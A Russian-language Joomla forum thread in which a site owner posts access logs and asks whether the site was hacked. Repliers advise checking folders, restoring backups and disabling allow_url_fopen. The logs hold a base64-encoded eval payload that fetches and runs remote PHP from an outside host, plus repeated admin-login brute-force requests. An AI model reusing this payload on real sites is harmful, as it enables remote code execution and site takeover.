Взломали или попытались - Безопасность сайтов на Joomla

Обнаружил сегодня в строках logs

5.9.221.225 - - [28/Mar/2013:00:08:27 +0400] "GET /?e=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2h3LWNhcmdvLnJ1L25ldGNhdF9maWxlcy8xNjcvMS50eHQnKSk7)); HTTP/1.0" 200 31566 "-" "-"
5.9.221.225 - - [28/Mar/2013:00:08:38 +0400] "GET /?cmd=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2h3LWNhcmdvLnJ1L25ldGNhdF9maWxlcy8xNjcvMS50eHQnKSk7)); HTTP/1.0" 200 31566 "-" "-"
5.9.221.225 - - [28/Mar/2013:00:08:38 +0400] "GET /?img=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2h3LWNhcmdvLnJ1L25ldGNhdF9maWxlcy8xNjcvMS50eHQnKSk7)); HTTP/1.0" 200 31566 "-" "-"
5.9.221.225 - - [28/Mar/2013:00:08:39 +0400] "GET /?var=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2h3LWNhcmdvLnJ1L25ldGNhdF9maWxlcy8xNjcvMS50eHQnKSk7)); HTTP/1.0" 200 31566 "-" "-"
5.9.221.225 - - [28/Mar/2013:00:08:39 +0400] "GET /?php=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2h3LWNhcmdvLnJ1L25ldGNhdF9maWxlcy8xNjcvMS50eHQnKSk7)); HTTP/1.0" 200 31566 "-" "-"

это взломали  или только попытались, и куда ушла зараза в базу или в файлы? очень прошу помощи.
93

Варезные расширения установлены на сайте?

НЕТ. только лицензии. у меня девероперские подписки нескольких студий шаблонов

прошерстил архив по фразе eval(base64

пусто

базу не проверял

каждый день приходят уведомления о попытках взлома сайтов моего аккаунта

пытаются взломать
если ни чего нет варезного и дырявого, и все обновлено до актуальных версий, то криминального нет ни чего
если что то есть дырявое или не обновленное, то возможно уже взломали посмотрите по логам и проверьте папки tmp и images

Пасиб за помощь, на всякий случай восстановил из резервной копии

Пасиб за помощь, на всякий случай восстановил из резервной копии

надо проверить а резервная копия может и не помочь
не вижу в логах, куда именно обращается к какому расширению или папке

содержимое index.php в корне сайта покажите. Странно что он 200 ответ вернул.
А это http://hw-cargo.ru/netcat_files/167/1.txt то что пытались сделать.

46.150.94.24 - - [26/Mar/2013:20:58:24 +0400] "GET /administrator/index.php HTTP/1.0" 200 4847 "-" "EXBGxaTXkDOEet"
46.150.94.24 - - [26/Mar/2013:20:59:42 +0400] "GET /administrator/ HTTP/1.0" 200 4576 "-" "5G7Q67kMGIjW67Pf"
46.150.94.24 - - [26/Mar/2013:20:59:42 +0400] "POST /administrator/ HTTP/1.0" 303 - "-" "5G7Q67kMGIjW67Pf"
46.150.94.24 - - [26/Mar/2013:20:59:42 +0400] "GET /administrator/index.php HTTP/1.0" 200 4847 "-" "5G7Q67kMGIjW67Pf"
46.150.94.24 - - [26/Mar/2013:21:00:52 +0400] "GET /administrator/ HTTP/1.0" 200 4576 "-" "a4IH8QJ 8fKQnTQ"
46.150.94.24 - - [26/Mar/2013:21:00:52 +0400] "POST /administrator/ HTTP/1.0" 303 - "-" "a4IH8QJ 8fKQnTQ"
46.150.94.24 - - [26/Mar/2013:21:00:53 +0400] "GET /administrator/index.php HTTP/1.0" 200 4847 "-" "a4IH8QJ 8fKQnTQ"
46.150.94.24 - - [26/Mar/2013:21:02:00 +0400] "GET /administrator/ HTTP/1.0" 200 4576 "-" "K8eULz4x1OXcMo7"
46.150.94.24 - - [26/Mar/2013:21:02:00 +0400] "POST /administrator/ HTTP/1.0" 303 - "-" "K8eULz4x1OXcMo7"
46.150.94.24 - - [26/Mar/2013:21:02:00 +0400] "GET /administrator/index.php HTTP/1.0" 200 4847 "-" "K8eULz4x1OXcMo7"
46.150.94.24 - - [26/Mar/2013:21:03:08 +0400] "GET /administrator/ HTTP/1.0" 200 4576 "-" "g kbp1fGiUE7RekVCz"
46.150.94.24 - - [26/Mar/2013:21:03:09 +0400] "POST /administrator/ HTTP/1.0" 303 - "-" "g kbp1fGiUE7RekVCz"
46.150.94.24 - - [26/Mar/2013:21:03:09 +0400] "GET /administrator/index.php HTTP/1.0" 200 4847 "-" "g kbp1fGiUE7RekVCz"
46.150.94.24 - - [26/Mar/2013:21:04:18 +0400] "GET /administrator/ HTTP/1.0" 200 4576 "-" "doQhHYfwTuuHQGWy B3i"
46.150.94.24 - - [26/Mar/2013:21:04:19 +0400] "POST /administrator/ HTTP/1.0" 303 - "-" "doQhHYfwTuuHQGWy B3i"
46.150.94.24 - - [26/Mar/2013:21:04:19 +0400] "GET /administrator/index.php HTTP/1.0" 200 4847 "-" "doQhHYfwTuuHQGWy B3i"
46.150.94.24 - - [26/Mar/2013:21:05:28 +0400] "GET /administrator/ HTTP/1.0" 200 4576 "-" "eaNxNPEr5E"
46.150.94.24 - - [26/Mar/2013:21:05:28 +0400] "POST /administrator/ HTTP/1.0" 303 - "-" "eaNxNPEr5E"
46.150.94.24 - - [26/Mar/2013:21:05:29 +0400] "GET /administrator/index.php HTTP/1.0" 200 4847 "-" "eaNxNPEr5E"
46.150.94.24 - - [26/Mar/2013:21:06:38 +0400] "GET /administrator/ HTTP/1.0" 200 4576 "-" "n3 iTOnG4 4ZWOt"
46.150.94.24 - - [26/Mar/2013:21:06:38 +0400] "POST /administrator/ HTTP/1.0" 303 - "-" "n3 iTOnG4 4ZWOt"
46.150.94.24 - - [26/Mar/2013:21:06:38 +0400] "GET /administrator/index.php HTTP/1.0" 200 4847 "-" "n3 iTOnG4 4ZWOt"
46.150.94.24 - - [26/Mar/2013:21:07:52 +0400] "GET /administrator/ HTTP/1.0" 200 4576 "-" "PS JVSlSJtRQ7j7DBo0"
46.150.94.24 - - [26/Mar/2013:21:07:53 +0400] "POST /administrator/ HTTP/1.0" 303 - "-" "PS JVSlSJtRQ7j7DBo0"
46.150.94.24 - - [26/Mar/2013:21:07:53 +0400] "GET /administrator/index.php HTTP/1.0" 200 4847 "-" "PS JVSlSJtRQ7j7DBo0"
46.150.94.24 - - [26/Mar/2013:21:09:14 +0400] "GET /administrator/ HTTP/1.0" 200 4576 "-" "1hrK8gE3G1zxgJuY2"
46.150.94.24 - - [26/Mar/2013:21:09:15 +0400] "POST /administrator/ HTTP/1.0" 303 - "-" "1hrK8gE3G1zxgJuY2"
46.150.94.24 - - [26/Mar/2013:21:09:15 +0400] "GET /administrator/index.php HTTP/1.0" 200 4847 "-" "1hrK8gE3G1zxgJuY2"
46.150.94.24 - - [26/Mar/2013:21:10:27 +0400] "GET /administrator/ HTTP/1.0" 200 4576 "-" "dfUGHNZn E"
46.150.94.24 - - [26/Mar/2013:21:10:27 +0400] "POST /administrator/ HTTP/1.0" 303 - "-" "dfUGHNZn E"
46.150.94.24 - - [26/Mar/2013:21:10:28 +0400] "GET /administrator/index.php HTTP/1.0" 200 4847 "-" "dfUGHNZn E"
46.150.94.24 - - [26/Mar/2013:21:11:37 +0400] "GET /administrator/ HTTP/1.0" 200 4576 "-" "vTaj2kBaDv"
46.150.94.24 - - [26/Mar/2013:21:11:37 +0400] "POST /administrator/ HTTP/1.0" 303 - "-" "vTaj2kBaDv"
46.150.94.24 - - [26/Mar/2013:21:11:37 +0400] "GET /administrator/index.php HTTP/1.0" 200 4847 "-" "vTaj2kBaDv"
46.150.94.24 - - [26/Mar/2013:21:12:48 +0400] "GET /administrator/ HTTP/1.0" 200 4576 "-" "98tNKidJ4Oud zd1"
46.150.94.24 - - [26/Mar/2013:21:12:49 +0400] "POST /administrator/ HTTP/1.0" 303 - "-" "98tNKidJ4Oud zd1"
46.150.94.24 - - [26/Mar/2013:21:12:49 +0400] "GET /administrator/index.php HTTP/1.0" 200 4847 "-" "98tNKidJ4Oud zd1"
46.150.94.24 - - [26/Mar/2013:21:13:57 +0400] "GET /administrator/ HTTP/1.0" 200 4576 "-" "S 5XF4Ij UUeuVN2"
46.150.94.24 - - [26/Mar/2013:21:13:57 +0400] "POST /administrator/ HTTP/1.0" 303 - "-" "S 5XF4Ij UUeuVN2"
46.150.94.24 - - [26/Mar/2013:21:13:57 +0400] "GET /administrator/index.php HTTP/1.0" 200 4847 "-" "S 5XF4Ij UUeuVN2"

Надо полагать пытались взломать?

содержимое index.php в корне сайта покажите. Странно что он 200 ответ вернул.
А это http://hw-cargo.ru/netcat_files/167/1.txt то что пытались сделать.

Вот содержимое:

<?php
/**
 * @package      Joomla.Site
 * @copyright   Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license      GNU General Public License version 2 or later; see LICENSE.txt
 */

// Set flag that this is a parent file.
define('_JEXEC', 1);
define('DS', DIRECTORY_SEPARATOR);

if (file_exists(dirname(__FILE__). '/defines.php')) {
   include_once dirname(__FILE__). '/defines.php';
}

if (!defined('_JDEFINES')) {
   define('JPATH_BASE', dirname(__FILE__));
   require_once JPATH_BASE.'/includes/defines.php';
}

require_once JPATH_BASE.'/includes/framework.php';

// Mark afterLoad in the profiler.
JDEBUG ? $_PROFILER->mark('afterLoad') : null;

// Instantiate the application.
$app = JFactory::getApplication('site');

// Initialise the application.
$app->initialise();

// Mark afterIntialise in the profiler.
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;

// Route the application.
$app->route();

// Mark afterRoute in the profiler.
JDEBUG ? $_PROFILER->mark('afterRoute') : null;

// Dispatch the application.
$app->dispatch();

// Mark afterDispatch in the profiler.
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;

// Render the application.
$app->render();

// Mark afterRender in the profiler.
JDEBUG ? $_PROFILER->mark('afterRender') : null;

// Return the response.
echo $app;

Слушайте надо чегото делать с этими хакерами, уже всех достали, ну в самом деле, творят что хотят. Нато их ловить и сажать.

В настройках PHP вашего хостинга нужно запретить работать с удаленными файлами как с ссылками (allow_url_fopen = Off), содержимое файла которое пытались загрузить ни что иное как Shell при помощи которого взломщики получают доступ к вашему сайту через удаленный шелл, даже не загружая его на ваш сайт.

Слушайте надо чегото делать с этими хакерами, уже всех достали, ну в самом деле, творят что хотят. Нато их ловить и сажать.

Может просто имеет смысл граммотней следить за своими сайтами? всех всеравно не пересожаите, тюрем не хватит)

В настройках PHP вашего хостинга нужно запретить работать с удаленными файлами как с ссылками (allow_url_fopen = Off)

А вто это уже интересно, я не слышал об этом. Не повлияет ли отключение этой функции на работоспособность сайта в целом?

Еще вчера на другом сайте в логах jhackguard

2013-03-29T14:39:06+00:00   CRITICAL   jhackguard   Changed GET value from:     eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2h3LWNhcmdvLnJ1L25ldGNhdF9maWxlcy8xNjcvMS50eHQnKSk7)); to:    ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2h3LWNhcmdvLnJ1L25ldGNhdF9maWxlcy8xNjcvMS50eHQnKSk7));

А вто это уже интересно, я не слышал об этом. Не повлияет ли отключение этой функции на работоспособность сайта в целом?

в целом не должно, на работу практически точно нет, а вот на автоматическое обновление расширений может, не на все на единичные, те которые работают по такой схеме, ну и может если у вас расширения стоят которым связываться необходимо с сервером разработчиков